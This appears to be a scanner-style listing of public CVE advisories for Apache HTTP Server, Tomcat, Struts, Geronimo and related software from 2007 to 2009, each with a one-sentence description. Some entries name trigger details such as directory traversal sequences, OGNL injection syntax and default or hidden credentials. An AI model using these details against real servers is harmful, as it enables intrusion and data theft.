| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
13327| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
13328| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
13329| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
13330| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
13331| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
13332| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
13333| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
13334| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
13335| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
13336| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
13337| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
13338| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
13339| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
13340| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
13341| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
13342| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
13343| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
13344| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
13345| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
13346| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
13347| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
13348| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
13349| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
13350| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
13351| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
13352| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
13353| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
13354| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
13355| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
13356| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
13357| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
13358| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
13359| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
13360| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
13361| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
13362| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
13363| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
13364| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
13365| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
13366| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
13367| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
13368| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
13369| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
13370| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
13371| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
13372| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
13373| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
13374| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers to bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
13375| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
13376| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
13377| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
13378| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
13379| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
13380| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
13381| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
13382| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
13383| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
13384| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
13385| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
13386| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
13387| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
13388| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
13389| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13390| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13391| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
13392| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
13393| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
13394| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
13395| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
13396| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
13397| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
13398| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
13399| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
13400| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
13401| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13402| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13403| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
13404| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
13405| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
13406| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
